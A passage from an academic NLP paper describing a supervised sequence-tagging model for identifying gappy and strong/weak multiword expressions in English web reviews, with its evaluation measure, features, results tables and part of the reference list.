partitioning of its tokens into segments such that each segment represents a single unit of lexical meaning. A multiword lexical expression may contain gaps, i.e. interruptions by other segments. We impose two restrictions on gaps that appear to be well-motivated linguistically: • Projectivity: Every expression filling a gap must be completely contained within that gap; gappy expressions may not interleave. • No nested gaps: A gap in an expression may be filled by other single- or multiword expressions, so long as those do not themselves contain gaps. Formal grammar. Our scheme corresponds to the following extended CFG (Thatcher, 1967), where S is the full sentence and terminals w are word tokens: S → X+ X → w+ (Y+ w+)∗ Y → w+ Each expression X or Y is lexicalized by the words in one or more underlined variables on the right-hand side. An X constituent may optionally contain one or more gaps filled by Y constituents, which must not contain gaps themselves.3 3MWEs with multiple gaps are rare but attested in data: e.g., putting me at my ease. We encountered one violation of the gap nesting constraint in the reviews data: I have21 nothing 2 1 but 2 1 fantastic things2 to21 say 2 1 . Additionally, the interrupted phrase 195 Denoting multiword groupings with subscripts, My wife had taken1 her ’072 Ford2 Fusion2 in1 for a routine oil3 change3 contains 3 multiword groups—{taken, in}, {’07, Ford, Fusion}, {oil, change}—and 7 single-word groups. The first MWE is gappy (ac- centuated by the box); a single word and a contiguous multiword group fall within the gap. The projectivity constraint forbids an analysis like taken1 her ’072 Ford1 Fusion2, while the gap nesting constraint for- bids taken1 her2 ’07 Ford2 Fusion2 in1. 3.1 Two-level Scheme: Strong vs. Weak MWEs Our annotated data distinguish two strengths of MWEs as discussed in §2. Augmenting the gram- mar of the previous section, we therefore designate nonterminals as strong (X , Y ) or weak (X̃ , Ỹ ): S → X̃+ X̃ → X+ (Ỹ + X+)∗ X → w+ (Ỹ + w+)∗ Ỹ → Y + Y → w+ A weak MWE may be lexicalized by single words and/or strong multiwords. Strong multiwords cannot contain weak multiwords except in gaps. Further, the contents of a gap cannot be part of any multiword that extends outside the gap.4 For example, consider the segmentation: he was willing to budge1 a2 little2 on1 the price which means4 a43 lot 4 3 to 4 me4. Subscripts denote strong MW groups and superscripts weak MW groups; un- marked tokens serve as single-word expressions. The MW groups are thus {budge, on}, {a, little}, {a, lot}, and {means, {a, lot}, to, me}. As should be evident from the grammar, the projectivity and gap-nesting constraints apply here just as in the 1-level scheme. 3.2 Evaluation Matching criteria. Given that most tokens do not belong to an MWE, to evaluate MWE identification we adopt a precision/recall-based measure from the coreference resolution literature. The MUC criterion (Vilain et al., 1995) measures precision and recall great gateways never1 before1 , so23 far 2 3 as 2 3 Hudson knew 2 , seen1 by Europeans was annotated in another corpus. 4This was violated 6 times in our annotated data: modifiers within gaps are sometimes collocated with the gappy expression, as in on12 a 1 2 tight 1 budget12 and have 1 2 little 1 doubt12. of links in terms of groups (units) implied by the transitive closure over those links.5 It can be defined as follows: Let a Ð b denote a link between two elements in the gold standard, and aÐ̂b denote a link in the system prediction. Let the ∗ operator denote the tran- sitive closure over all links, such that ⟦aÐ∗b⟧ is 1 if a and b belong to the same (gold) set, and 0 other- wise. Assuming there are no redundant6 links within any annotation (which in our case is guaranteed by linking consecutive words in each MWE), we can write the MUC precision and recall measures as: P = ∑a,b∶aÐ̂b ⟦aÐ∗b⟧∑a,b∶aÐ̂b 1 R = ∑a,b∶aÐb ⟦aÐ̂∗b⟧∑a,b∶aÐb 1 This awards partial credit when predicted and gold expressions overlap in part. Requiring full MWEs to match exactly would arguably be too stringent, over- penalizing larger MWEs for minor disagreements. We combine precision and recall using the standard F1 measure of their harmonic mean. This is the link- based evaluation used for most of our experiments. For comparison, we also report some results with a more stringent exact match evaluation where the span of the predicted MWE must be identical to the span of the gold MWE for it to count as correct. Strength averaging. Recall that the 2-level scheme (§3.1) distinguishes strong vs. weak links/ groups, where the latter category applies to reason- ably compositional collocations as well as ambigu- ous or difficult cases. If where one annotation uses a weak link the other has a strong link or no link at all, we want to penalize the disagreement less than if one had a strong link and the other had no link. To accommodate the 2-level scheme, we therefore average F↑1 , in which all weak links have been con- verted to strong links, and F↓1 , in which they have been removed: F1 = 12 (F↑1 + F↓1 ).7 If neither annota- tion contains any weak links, this equals the MUC 5As a criterion for coreference resolution, the MUC measure has perceived shortcomings which have prompted several other measures (see Recasens and Hovy, 2011 for a review). It is not clear, however, whether any of these criticisms are relevant to MWE identification. 6A link between a and b is redundant if the other links already imply that a and b belong to the same set. A set of N elements is expressed non-redundantly with exactly N −1 links. 7Overall precision and recall are likewise computed by aver- aging “strengthened” and “weakened” measurements. 196 no gaps, 1-level he O was O willing O to O budge O a B little I on O the O price O which O means B a I lot I to I me I . O (O∣BI+)+ no gaps, 2-level he O was O willing O to O budge O a B little Ī on O the O price O which O means B a Ĩ lot Ī to Ĩ me Ĩ . O (O∣B[ĪĨ]+)+ gappy, 1-level he O was O willing O to O budge B a b little i on I the O price O which O means B a I lot I to I me I . O (O∣B(o∣bi+∣I)∗I+)+ gappy, 2-level he O was O willing O to O budge B a b little ı̄ on Ī the O price O which O means B a Ĩ lot Ī to Ĩ me Ĩ . O (O∣B(o∣b[ı̄ı̃]+∣[ĪĨ])∗[ĪĨ]+)+ Figure 2: Examples and regular expressions for the 4 tagging schemes. Strong links are depicted with solid arcs, and weak links with dotted arcs. The bottom analysis was provided by an annotator; the ones above are simplifications. score because F1 = F↑1 = F↓1 . This method applies to both the link-based and exact match evaluation criteria. 4 Tagging Schemes Following (Ramshaw and Marcus, 1995), shallow an- alysis is often modeled as a sequence-chunking task, with tags containing chunk-positional information. The BIO scheme and variants (e.g., BILOU; Ratinov and Roth, 2009) are standard for tasks like named entity recognition, supersense tagging, and shallow parsing. The language of derivations licensed by the gram- mars in §3 allows for a tag-based encoding of MWE analyses with only bigram constraints. We describe 4 tagging schemes for MWE identification, starting with BIO and working up to more expressive variants. They are depicted in figure 2. No gaps, 1-level (3 tags). This is the standard con- tiguous chunking representation from Ramshaw and Marcus (1995) using the tags {O B I}. O is for to- kens outside any chunk; B marks tokens beginning a chunk; and I marks other tokens inside a chunk. Multiword chunks will thus start with B and then I. B must always be followed by I; I is not allowed at the beginning of the sentence or following O. No gaps, 2-level (4 tags). We can distinguish strength levels by splitting I into two tags: Ī for strong expressions and Ĩ for weak expressions. To express strong and weak contiguous chunks requires 4 tags: {O B Ī Ĩ}. (Marking B with a strength as well would be redundant because MWEs are never length- one chunks.) The constraints on Ī and Ĩ are the same as the constraints on I in previous schemes. If Ī and Ĩ occur next to each other, the strong attachment will receive higher precedence, resulting in analysis of strong MWEs as nested within weak MWEs. Gappy, 1-level (6 tags). Because gaps cannot themselves contain gappy expressions (we do not support full recursivity), a finite number of additional tags are sufficient to encode gappy chunks. We there- fore add lowercase tag variants representing tokens within a gap: {O o B b I i}. In addition to the con- straints stated above, no within-gap tag may occur at the beginning or end of the sentence or immediately following or preceding O. Within a gap, b, i, and o behave like their out-of-gap counterparts. Gappy, 2-level (8 tags). 8 tags are required to en- code the 2-level scheme with gaps: {O o B b Ī ı̄ Ĩ ı̃}. Variants of the inside tag are marked for strength of the incoming link—this applies gap-externally (capi- talized tags) and gap-internally (lowercase tags). If Ī or Ĩ immediately follows a gap, its diacritic reflects the strength of the gappy expression, not the gap’s contents. 5 Model With the above representations we model MWE iden- tification as sequence tagging, one of the paradigms that has been used previously for identifying con- tiguous MWEs (Constant and Sigogne, 2011, see §7).8 Constraints on legal tag bigrams are sufficient to ensure the full tagging is well-formed subject to the regular expressions in figure 2; we enforce these 8Hierarchical modeling based on our representations is left to future work. 197 constraints in our experiments.9 In NLP, conditional random fields (Lafferty et al., 2001) and the structured perceptron (Collins, 2002) are popular techniques for discriminative sequence modeling with a convex loss function. We choose the second approach for its speed: learning and in- ference depend mainly on the runtime of the Viterbi algorithm, whose asymptotic complexity is linear in the length of the input and (with a first-order Markov assumption) quadratic in the number of tags. Below, we review the structured perceptron and discuss our cost function, features, and experimental setup. 5.1 Cost-Augmented Structured Perceptron The structured perceptron’s (Collins, 2002) learn- ing procedure, algorithm 1, generalizes the classic perceptron algorithm (Freund and Schapire, 1999) to incorporate a structured decoding step (for sequences, the Viterbi algorithm) in the inner loop. Thus, train- ing requires only max inference, which is fast with a first-order Markov assumption. In training, features are adjusted where a tagging error is made; the pro- cedure can be viewed as optimizing the structured hinge loss. The output of learning is a weight vector that parametrizes a feature-rich scoring function over candidate labelings of a sequence. To better align the learning algorithm with our F -score–based MWE evaluation (§3.2), we use a cost-augmented version of the structured perceptron that is sensitive to different kinds of errors during training. When recall is the bigger obstacle, we can adopt the following cost function: given a sentence x, its gold labeling y∗, and a candidate labeling y′, cost(y∗,y′,x) = ∣y ∗∣∑ j=1 c(y ∗ j ,y ′ j) where c(y∗,y′) = ⟦y∗ ≠ y′⟧+ρ⟦y∗ ∈ {B,b}∧y′ ∈ {O,o}⟧ A single nonnegative hyperparameter, ρ , controls the tradeoff between recall and accuracy; higher ρ biases the model in favor of recall (possibly hurt- ing accuracy and precision). This is a slight variant of the recall-oriented cost function of Mohit et al. (2012). The difference is that we only penalize beginning-of-expression recall errors. Preliminary 9The 8-tag scheme licenses 42 tag bigrams: sequences such as B O and o ı̄ are prohibited. There are also constraints on the allowed tags at the beginning and end of the sequence. Input: data ⟨⟨x(n),y(n)⟩⟩N n=1; number of iterations M w ← 0 w ← 0 t ← 1 for m = 1 to M do for n = 1 to N do⟨x,y⟩ ← ⟨x(n),y(n)⟩ ŷ ← arg maxy′ (w⊺g(x,y′)+cost(y,y′,x)) if ŷ ≠ y then w ← w+g(x,y)−g(x,ŷ) w ← w+tg(x,y)−tg(x,ŷ) end t ← t +1 end end Output: w−(w/t) Algorithm 1: Training with the averaged perceptron. (Adapted from Daumé, 2006, p. 19.) experiments showed that a cost function penalizing all recall errors—i.e., with ρ⟦y∗ ≠ O∧ y′ = O⟧ as the second term, as in Mohit et al.—tended to append additional tokens to high-confidence MWEs (such as proper names) rather than encourage new MWEs, which would require positing at least two new non- outside tags. 5.2 Features Basic features. These are largely based on those of Constant et al. (2012): they look at word unigrams and bigrams, character prefixes and suffixes, and POS tags, as well as lexicon entries that match lemmas10 of multiple words in the sentence. Appendix A lists the basic features in detail. Some of the basic features make use of lexicons. We use or construct 10 lists of English MWEs: all multiword entries in WordNet (Fellbaum, 1998); all multiword chunks in SemCor (Miller et al., 1993); all multiword entries in English Wiktionary;11 the WikiMwe dataset mined from English Wikipedia (Hartmann et al., 2012); the SAID database of phrasal lexical idioms (Kuiper et al., 2003); the named entities and other MWEs in the WSJ corpus on the English side of the CEDT (Hajič et al., 2012); 10The WordNet API in NLTK (Bird et al., 2009) was used for lemmatization. 11http://en.wiktionary.org; data obtained from https://toolserver.org/~enwikt/definitions/ enwikt-defs-20130814-en.tsv.gz 198 LOOKUP SUPERVISED MODEL preexising lexicons entries max gap length P R F1 σ P R F1 σ none 0 74.39 44.43 55.57 2.19 WordNet + SemCor 71k 0 46.15 28.41 35.10 2.44 74.51 45.79 56.64 1.90 6 lexicons 420k 0 35.05 46.76 40.00 2.88 76.08 52.39 61.95 1.67 10 lexicons 437k 0 33.98 47.29 39.48 2.88 75.95 51.39 61.17 2.30 best configuration with in-domain lexicon 1 46.66 47.90 47.18 2.31 76.64 51.91 61.84 1.65 2 lexicons + MWtypes(train)≥1 6 lexicons + MWtypes(train)≥2 Table 2: Use of lexicons for lookup-based vs. statistical segmentation. Supervised learning used only basic features and the structured perceptron, with the 8-tag scheme. Results are with the link-based matching criterion for evaluation. Top: Comparison of preexisting lexicons. “6 lexicons” refers to WordNet and SemCor plus SAID, WikiMwe, Phrases.net, and English Wiktionary; “10 lexicons” adds MWEs from CEDT, VNC, LVC, and Oyz. (In these lookup-based configurations, allowing gappy MWEs never helps performance.) Bottom: Combining preexisting lexicons with a lexicon derived from MWEs annotated in the training portion of each cross-validation fold at least once (lookup) or twice (model). All precision, recall, and F1 percentages are averaged across 8 folds of cross-validation on train; standard deviations are shown for the F1 score. In each column, the highest value using only preexisting lexicons is underlined, and the highest overall value is bolded. The boxed row indicates the configuration used as the basis for subsequent experiments. the verb-particle constructions (VPCs) dataset of (Baldwin, 2008); a list of light verb constructions (LVCs) provided by Claire Bonial; and two idioms websites.12 After preprocessing, each lexical entry consists of an ordered sequence of word lemmas, some of which may be variables like <something>. Given a sentence and one or more of the lexicons, lookup proceeds as follows: we enumerate entries whose lemma sequences match a sequence of lemma- tized tokens, and build a lattice of possible analyses over the sentence. We find the shortest path (i.e., using as few expressions as possible) with dynamic programming, allowing gaps of up to length 2.13 Unsupervised word clusters. Distributional clus- tering on large (unlabeled) corpora can produce lexi- cal generalizations that are useful for syntactic and semantic analysis tasks (e.g.: Miller et al., 2004; Koo et al., 2008; Turian et al., 2010; Owoputi et al., 2013; Grave et al., 2013). We were interested to see whether a similar pattern would hold for MWE identification, given that MWEs are concerned with what is lexi- cally idiosyncratic—i.e., backing off from specific lexemes to word classes may lose the MWE-relevant information. Brown clustering14 (Brown et al., 1992) 12http://www.phrases.net/ and http://home. postech.ac.kr/~oyz/doc/idiom.html 13Each top-level lexical expression (single- or multiword) incurs a cost of 1; each expression within a gap has cost 1.25. 14With Liang’s (2005) implementation: https://github. com/percyliang/brown-cluster. We obtain 1,000 clusters on the 21-million-word Yelp Academic Dataset15 (which is similar in genre to the annotated web re- views data) gives us a hard clustering of word types. To our tagger, we add features mapping the previ- ous, current, and next token to Brown cluster IDs. The feature for the current token conjoins the word lemma with the cluster ID. Part-of-speech tags. We compared three PTB- style POS taggers on the full REVIEWS subcor- pus (train+test). The Stanford CoreNLP tagger16 (Toutanova et al., 2003) yields an accuracy of 90.4%. The ARK TweetNLP tagger v. 0.3.2 (Owoputi et al., 2013) achieves 90.1% with the model17 trained on the Twitter corpus of Ritter et al. (2011), and 94.9% when trained on the ANSWERS, EMAIL, NEWSGROUP, and WEBLOG subcorpora of WTB. We use this third con- figuration to produce automatic POS tags for training and testing our MWE tagger. (A comparison condi- tion in §6.3 uses oracle POS tags.) 5.3 Experimental Setup The corpus of web reviews described in §2 is used for training and evaluation. 101 arbitrarily chosen documents (500 sentences, 7,171 words) were held from words appearing at least 25 times. 15https://www.yelp.com/academic_dataset 16v. 3.2.0, with english-bidirectional-distsim 17http://www.ark.cs.cmu.edu/TweetNLP/model. ritter_ptb_alldata_fixed.20130723 199 LINK-BASED EXACT MATCH configuration M ρ ∣w∣ P R F1 P R F1 base model 5 — 1,765k 69.27 50.49 58.35 60.99 48.27 53.85+ recall cost 4 150 1,765k 61.09 57.94 59.41 53.09 55.38 54.17+ clusters 3 100 2,146k 63.98 55.51 59.39 56.34 53.24 54.70+ oracle POS 4 100 2,145k 66.19 59.35 62.53 58.51 57.00 57.71 Table 3: Comparison of supervised models on test (using the 8-tag scheme). The base model corresponds to the boxed result in table table 2, but here evaluated on test. For each configuration, the number of training iterations M and (except for the base model) the recall-oriented hyperparameter ρ were tuned by cross-validation on train. out as a final test set. This left 3,312 sentences/ 48,408 words for training/development (train). Fea- ture engineering and hyperparameter tuning were conducted with 8-fold cross-validation on train. The 8-tag scheme is used except where otherwise noted. In learning with the structured perceptron (algo- rithm 1), we employ two well-known techniques that can both be viewed as regularization. First, we use the average of parameters over all timesteps of learn- ing. Second, within each cross-validation fold, we de- termine the number of training iterations (epochs) M by early stopping—that is, after each iteration, we use the model to decode the held-out data, and when that accuracy ceases to improve, use the previous model. The two hyperparameters are the number of iterations and the value of the recall cost hyperparameter (ρ ). Both are tuned via cross-validation on train; we use the multiple of 50 that maximizes average link-based F1. The chosen values are shown in table 3. Experi- ments were managed with the ducttape tool.18 6 Results We experimentally address the following questions to probe and justify our modeling approach. 6.1 Is supervised learning necessary? Previous MWE identification studies have found benefit to statistical learning over heuristic lexicon lookup (Constant and Sigogne, 2011; Green et al., 2012). Our first experiment tests whether this holds for comprehensive MWE identification: it compares our supervised tagging approach with baselines of heuristic lookup on preexisting lexicons. The base- lines construct a lattice for each sentence using the same method as lexicon-based model features (§5.2). If multiple lexicons are used, the union of their en- 18https://github.com/jhclark/ducttape/ tries is used to construct the lattice. The resulting segmentation—which does not encode a strength distinction—is evaluated against the gold standard. Table 2 shows the results. Even with just the la- beled training set as input, the supervised approach beats the strongest heuristic baseline (that incorpo- rates in-domain lexicon entries extracted from the training data) by 30 precision points, while achieving comparable recall. For example, the baseline (but not the statistical model) incorrectly predicts an MWE in places to eat in Baltimore (because eat in, meaning ‘eat at home,’ is listed in WordNet). The supervised approach has learned not to trust WordNet too much due to this sort of ambiguity. Downstream applica- tions that currently use lexicon matching for MWE identification (e.g., Ghoneim and Diab, 2013) likely stand to benefit from our statistical approach. 6.2 How best to exploit MWE lexicons (type-level information)? For statistical tagging (right portion of table 2), using more preexisting (out-of-domain) lexicons generally improves recall; precision also improves a bit. A lexicon of MWEs occurring in the non-held-out training data at least twice19 (table 2, bottom right) is marginally worse (better precision/worse recall) than the best result using only preexisting lexicons. 6.3 Variations on the base model We experiment with some of the modeling alterna- tives discussed in §5. Results appear in table 3 under both the link-based and exact match evaluation cri- teria. We note that the exact match scores are (as expected) several points lower. 19If we train with access to the full lexicon of training set MWEs, the learner credulously overfits to relying on that lexicon—after all, it has perfect coverage of the training data!— which proves fatal for the model at test time. 200 Recall-oriented cost. The recall-oriented cost adds about 1 link-based F1 point, sacrificing precision in favor of recall. Unsupervised word clusters. When combined with the recall-oriented cost, these produce a slight improvement to precision/degradation to recall, im- proving exact match F1 but not affecting link-based F1. Only a few clusters receive high positive weight; one of these consists of matter, joke, biggie, pun, avail, clue, corkage, frills, worries, etc. These words are diverse semantically, but all occur in collocations with no, which is what makes the cluster coherent and useful to the MWE model. Oracle part-of-speech tags. Using human- annotated rather than automatic POS tags improves MWE identification by about 3 F1 points on test (similar differences were observed in development). 6.4 What are the highest-weighted features? An advantage of the linear modeling framework is that we can examine learned feature weights to gain some insight into the model’s behavior. In general, the highest-weighted features are the lexicon matching features and features indicative of proper names (POS tag of proper noun, capitalized word not at the beginning of the sentence, etc.). Despite the occasional cluster capturing colloca- tional or idiomatic groupings, as described in the previous section, the clusters appear to be mostly useful for identifying words that tend to belong (or not) to proper names. For example, the cluster with street, road, freeway, highway, airport, etc., as well as words outside of the cluster vocabulary, weigh in favor of an MWE. A cluster with everyday desti- nations (neighborhood, doctor, hotel, bank, dentist) prefers non-MWEs, presumably because these words are not typically part of proper names in this corpus. This was from the best model using non-oracle POS tags, so the clusters are perhaps useful in correct- ing for proper nouns that were mistakenly tagged as common nouns. One caveat, though, is that it is hard to discern the impact of these specific features where others may be capturing essentially the same information. 6.5 How heterogeneous are learned MWEs? On test, the final model (with automatic POS tags) predicts 365 MWE instances (31 are gappy; 23 are POS pattern # examples (lowercased lemmas) NOUN NOUN 53 customer service, oil change VERB PREP 36 work with, deal with, yell at PROPN PROPN 29 eagle transmission, comfort zone ADJ NOUN 21 major award, top notch, mental health VERB PART 20 move out, end up, pick up, pass up VERB ADV 17 come back, come in, come by, stay away PREP NOUN 12 on time, in fact, in cash, for instance VERB NOUN 10 take care, make money, give crap VERB PRON 10 thank you, get it PREP PREP 8 out of, due to, out ta, in between ADV ADV 6 no matter, up front, at all, early on DET NOUN 6 a lot, a little, a bit, a deal VERB DET NOUN 6 answer the phone, take a chance NOUN PREP 5 kind of, care for, tip on, answer to Table 4: Top predicted POS patterns and frequencies. weak). There are 298 unique MWE types. Organizing the predicted MWEs by their coarse POS sequence reveals that the model is not too preju- diced in the kinds of expressions it recognizes: the 298 types fall under 89 unique POS+strength patterns. Table 4 shows the 14 POS sequences predicted 5 or more times as strong MWEs. Some of the examples (major award, a deal, tip on) are false positives, but most are correct. Singleton patterns include PROPN VERB (god forbid), PREP DET (at that), ADJ PRON (worth it), and PREP VERB PREP (to die for). True positive MWEs mostly consist of (a) named entities, and (b) lexical idioms seen in training and/or listed in one of the lexicons. Occasionally the sys- tem correctly guesses an unseen and OOV idiom based on features such as hyphenation (walk - in) and capitalization/OOV words (Chili Relleno, BIG MIS- TAKE). On test, 244 gold MWE types were unseen in training; the system found 93 true positives (where the type was predicted at least once), 109 false posi- tives, and 151 false negatives—an unseen type recall rate of 38%. Removing types that occurred in lexi- cons leaves 35 true positives, 61 false positives, and 111 false negatives—a unseen and OOV type recall rate of 24%. 6.6 What kinds of mismatches occur? Inspection of the output turns up false positives due to ambiguity (e.g., Spongy and sweet bread); false negatives (top to bottom); and overlap (get high qual- ity service, gold get high quality service; live up to, gold live up to). A number of the mismatches turn 201 scheme ∣Y∣ ρ M ∣w∣ P R F1 no gaps, 1-level 3 100 2.1 733k 73.33 55.72 63.20 no gaps, 2-level 4 150 3.3 977k 72.60 59.11 65.09 gappy, 1-level 6 200 1.6 1,466k 66.48 61.26 63.65 gappy, 2-level 8 100 3.5 1,954k 73.27 60.44 66.15 Table 5: Training with different tagging schemes. Results are cross-validation averages on train. All schemes are evaluated against the full gold standard (8 tags). out to be problems with the gold standard, like hav- ing our water shut off (gold having our water shut off ). This suggests that even noisy automatic taggers might help identify annotation inconsistencies and errors for manual correction. 6.7 Are gappiness and the strength distinction learned in practice? Three quarters of MWEs are strong and contain no gaps. To see whether our model is actually sensi- tive to the phenomena of gappiness and strength, we train on data simplified to remove one or both distinctions—as in the first 3 labelings in figure 2— and evaluate against the full 8-tag scheme. For the model with the recall cost, clusters, and oracle POS tags, we evaluate each of these simplifications of the training data in table 5. The gold standard for evaluation remains the same across all conditions. If the model was unable to recover gappy expres- sions or the strong/weak distinction, we would expect it to do no better when trained with the full tagset than with the simplified tagset. However, there is some loss in performance as the tagset for learning is sim- plified, which suggests that gappiness and strength are being learned to an extent. 7 Related Work Our annotated corpus (Schneider et al., 2014) joins several resources that indicate certain varieties of MWEs: lexicons such as WordNet (Fellbaum, 1998), SAID (Kuiper et al., 2003), and WikiMwe (Hartmann et al., 2012); targeted lists (Baldwin, 2005, 2008; Cook et al., 2008; Tu and Roth, 2011, 2012); web- sites like Wiktionary and Phrases.net; and large-scale corpora such as SemCor (Miller et al., 1993), the French Treebank (Abeillé et al., 2003), the Szeged- ParalellFX corpus (Vincze, 2012), and the Prague Czech-English Dependency Treebank (Čmejrek et al., 2005). The difference is that Schneider et al. (2014) pursued a comprehensive annotation approach rather than targeting specific varieties of MWEs or relying on a preexisting lexical resource. The annotations are shallow, not relying explicitly on syntax (though in principle they could be mapped onto the parses in the Web Treebank). In terms of modeling, the use of machine learn- ing classification (Hashimoto and Kawahara, 2008; Shigeto et al., 2013) and specifically BIO sequence tagging (Diab and Bhutada, 2009; Constant and Si- gogne, 2011; Constant et al., 2012; Vincze et al., 2013) for contextual recognition of MWEs is not new. Lexical semantic classification tasks like named entity recognition (e.g., Ratinov and Roth, 2009), su- persense tagging (Ciaramita and Altun, 2006; Paaß and Reichartz, 2009), and index term identification (Newman et al., 2012) also involve chunking of cer- tain MWEs. But our discriminative models, facili- tated by the new corpus, broaden the scope of the MWE identification task to include many varieties of MWEs at once, including explicit marking of gaps and a strength distinction. By contrast, the afore- mentioned identification systems, as well as some MWE-enhanced syntactic parsers (e.g., Green et al., 2012), have been restricted to contiguous MWEs. However, Green et al. (2011) allow gaps to be de- scribed as constituents in a syntax tree. Gimpel and Smith’s (2011) shallow, gappy language model al- lows arbitrary token groupings within a sentence, whereas our model imposes projectivity and nest- ing constraints (§3). Blunsom and Baldwin (2006) present a sequence model for HPSG supertagging, and evaluate performance on discontinuous MWEs, though the sequence model treats the non-adjacent component supertags like other labels—it cannot en- force that they mutually require one another, as we do via the gappy tagging scheme (§3.1). The lexicon lookup procedures of Bejček et al. (2013) can match gappy MWEs, but are nonstatistical and extremely error-prone when tuned for high oracle recall. Another major thread of research has pursued un- supervised discovery of multiword types from raw corpora, such as with statistical association measures (Church et al., 1991; Pecina, 2010; Ramisch et al., 2012, inter alia), parallel corpora (Melamed, 1997; Moirón and Tiedemann, 2006; Tsvetkov and Wint- ner, 2010), or a combination thereof (Tsvetkov and 202 Wintner, 2011); this may be followed by a lookup- and-classify approach to contextual identification (Ramisch et al., 2010). Though preliminary experi- ments with our models did not show benefit to incor- porating such automatically constructed lexicons, we hope these two perspectives can be brought together in future work. 8 Conclusion This article has presented the first supervised model for identifying heterogeneous multiword expressions in English text. Our feature-rich discriminative se- quence tagger performs shallow chunking with a novel scheme that allows for MWEs containing gaps, and includes a strength distinction to separate highly idiomatic expressions from collocations. It is trained and evaluated on a corpus of English web reviews that are comprehensively annotated for multiword expressions. Beyond the training data, its features in- corporate evidence from external resources—several lexicons as well as unsupervised word clusters; we show experimentally that this statistical approach is far superior to identifying MWEs by heuristic lexicon lookup alone. Future extensions might integrate addi- tional features (e.g., exploiting statistical association measures computed over large corpora), enhance the lexical representation (e.g., by adding semantic tags), improve the expressiveness of the model (e.g., with higher-order features and inference), or integrate the model with other tasks (such as parsing and transla- tion). Our data and open source software are released at http://www.ark.cs.cmu.edu/LexSem/. Acknowledgments This research was supported in part by NSF CA- REER grant IIS-1054319, Google through the Read- ing is Believing project at CMU, and DARPA grant FA8750-12-2-0342 funded under the DEFT program. We are grateful to Kevin Knight, Martha Palmer, Claire Bonial, Lori Levin, Ed Hovy, Tim Baldwin, Omri Abend, members of JHU CLSP, the NLP group at Berkeley, and the Noah’s ARK group at CMU, and anonymous reviewers for valuable feedback. A Basic Features All are conjoined with the current label, yi. Label Features 1. previous label (the only first-order feature) Token Features Original token 2. i = {1,2} 3. i = ∣w∣−{0,1} 4. capitalized ∧ ⟦i = 0⟧ 5. word shape Lowercased token 6. prefix: [wi]k1 ∣4k=1 7. suffix: [wi]∣w∣j ∣∣w∣j=∣w∣−3 8. has digit 9. has non-alphanumeric c 10. context word: w j ∣i+2j=i−2 11. context word bigram: w j+1j ∣i+1j=i−2 Lemma Features 12. lemma + context lemma if one of them is a verb and the other is a noun, verb, adjective, adverb, preposition, or particle: λi ∧ λ j ∣i+2j=i−2 Part-of-speech Features 13. context POS: pos j ∣i+2j=i−2 14. context POS bigram: pos j+1j ∣i+1j=i−2 15. word + context POS: wi ∧posi±1 16. context word + POS: wi±1 ∧posi Lexicon Features (unlexicalized) WordNet only 17. OOV: λi is not in WordNet as a unigram lemma ∧ posi 18. compound: non-punctuation lemma λi and the {previous, next} lemma in the sentence (if it is non-punctuation; an inter- vening hyphen is allowed) form an entry in WordNet, possibly separated by a hyphen or space 19. compound-hyphen: posi = HYPH ∧ previous and next tokens form an entry in WordNet, possibly separated by a hyphen or space 20. ambiguity class: if content word unigram λi is in WordNet, the set of POS categories it can belong to; else posi if not a content POS ∧ the POS of the longest MW match to which λi belongs (if any) ∧ the position in that match (B or I) For each multiword lexicon 21. lexicon name ∧ status of token i in the shortest path segmen- tation (O, B, or I) ∧ subcategory of lexical entry whose match includes token i, if matched ∧ whether the match is gappy 22. the above ∧ POS tags of the first and last matched tokens in the expression Over all multiword lexicons 23. at least k lexicons contain a match that includes this token (if n ≥ 1 matches, n active features) 24. at least k lexicons contain a match that includes this token, starts with a given POS, and ends with a given POS 203 References Anne Abeillé, Lionel Clément, and François Toussenel. 2003. Building a treebank for French. In Anne Abeillé and Nancy Ide, editors, Treebanks, volume 20 of Text, Speech and Language Technology, pages 165–187. Kluwer Academic Publishers, Dordrecht, The Nether- lands. Timothy Baldwin. 2005. Looking for prepositional verbs in corpus data. In Proc. of the Second ACL-SIGSEM Workshop on the Linguistic Dimensions of Prepositions and their Use in Computational Linguistics Formalisms and Applications, pages 115–126. Colchester, UK. Timothy Baldwin. 2008. A resource for evaluating the deep lexical acquisition of English verb-particle con- structions. In Proc. of MWE, pages 1–2. Marrakech, Morocco. Timothy Baldwin and Su Nam Kim. 2010. Multiword expressions. In Nitin Indurkhya and Fred J. Damerau, editors, Handbook of Natural Language Processing, Second Edition. CRC Press, Taylor and Francis Group, Boca Raton, Florida, USA. Eduard Bejček, Pavel Straňák, and Pavel Pecina. 2013. Syntactic identification of occurrences of multiword expressions in text using a lexicon with dependency structures. In Proc. of the 9th Workshop on Multiword Expressions, pages 106–115. Atlanta, Georgia, USA. Gábor Berend. 2011. Opinion expression mining by ex- ploiting keyphrase extraction. In Proc. of 5th Interna- tional Joint Conference on Natural Language Process- ing, pages 1162–1170. Chiang Mai, Thailand. Ann Bies, Justin Mott, Colin Warner, and Seth Kulick. 2012a. English Web Treebank. Technical Report LDC2012T13, Linguistic Data Consortium, Philadel- phia, Pennsylvania, USA. Ann Bies, Justin Mott, Colin Warner, and Seth Kulick. 2012b. English Web Treebank. Technical Report LDC2012T13, Linguistic Data Consortium, Philadel- phia, Pennsylvania, USA. Steven Bird, Ewan Klein, and Edward Loper. 2009. Natu- ral Language Processing with Python: Analyzing Text with the Natural Language Toolkit. O’Reilly Media, Inc., Sebastopol, California, USA. Phil Blunsom and Timothy Baldwin. 2006. Multilingual deep lexical acquisition for HPSGs via supertagging. In Proc. of EMNLP, pages 164–171. Sydney, Australia. Peter F. Brown, Peter V. deSouza, Robert L. Mercer, Vin- cent J. Della Pietra, and Jenifer C. Lai. 1992. Class- based n-gram models of natural language. Computa- tional Linguistics, 18(4):467–479. Marine Carpuat and Mona Diab. 2010. Task-based eval- uation of multiword expressions: a pilot study in sta- tistical machine translation. In Proc. of NAACL-HLT, pages 242–245. Los Angeles, California, USA. Kenneth Church, William Gale, Patrick Hanks, and Don- ald Hindle. 1991. Using statistics in lexical analysis. In Uri Zernik, editor, Lexical acquisition: exploiting on-line resources to build a lexicon, pages 115–164. Lawrence Erlbaum Associates, Hillsdale, New Jersey, USA. Massimiliano Ciaramita and Yasemin Altun. 2006. Broad- coverage sense disambiguation and information extrac- tion with a supersense sequence tagger. In Proc. of EMNLP, pages 594–602. Sydney, Australia. Michael Collins. 2002. Discriminative training methods for Hidden Markov Models: theory and experiments with perceptron algorithms. In Proc. of EMNLP, pages 1–8. Philadelphia, Pennsylvania, USA. Matthieu Constant and Anthony Sigogne. 2011. MWU- aware part-of-speech tagging with a CRF model and lexical resources. In Proc. of the Workshop on Multi- word Expressions: from Parsing and Generation to the Real 